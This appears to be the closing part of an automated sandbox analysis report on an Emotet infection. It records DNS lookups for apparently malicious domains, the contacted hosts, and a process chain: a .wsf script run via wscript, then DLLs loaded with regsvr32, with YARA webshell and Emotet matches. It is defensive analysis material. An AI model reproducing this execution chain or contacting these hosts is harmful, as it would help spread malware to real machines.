          Mar 20, 2023 09:06:38.754851103 CET1.1.1.1192.168.2.30x4d17No error (0)bbvoyage.com31.31.196.172A (IP address)IN (0x0001)false
          Mar 20, 2023 09:06:39.699096918 CET1.1.1.1192.168.2.30x8dc3No error (0)www.gomespontes.com.brgomespontes.com.brCNAME (Canonical name)IN (0x0001)false
          Mar 20, 2023 09:06:39.699096918 CET1.1.1.1192.168.2.30x8dc3No error (0)gomespontes.com.br186.202.153.5A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • penshorn.org
          • bbvoyage.com
          • www.gomespontes.com.br
          • 164.90.222.65

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:09:06:33
          Start date:20/03/2023
          Path:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail
          Imagebase:0x7ff64d520000
          File size:41778000 bytes
          MD5 hash:CA3FDE8329DE07C95897DB0D828545CD
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Target ID:1
          Start time:09:06:34
          Start date:20/03/2023
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"
          Imagebase:0x7ff7e91a0000
          File size:165888 bytes
          MD5 hash:563EDAE37876138FDFF47F3E7A9A78FD
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1411114207.000002D845CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1413926742.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1410988197.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1411114207.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1412954439.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1542433572.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1414114730.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          Reputation:moderate

          General

          Target ID:3
          Start time:09:06:41
          Start date:20/03/2023
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
          Imagebase:0x7ff6d5170000
          File size:24064 bytes
          MD5 hash:578BAB56836A3FE455FFC7883041825B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          Reputation:moderate

          General

          Target ID:4
          Start time:09:06:44
          Start date:20/03/2023
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
          Imagebase:0x7ff6d5170000
          File size:24064 bytes
          MD5 hash:578BAB56836A3FE455FFC7883041825B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:moderate

          Disassembly

          No disassembly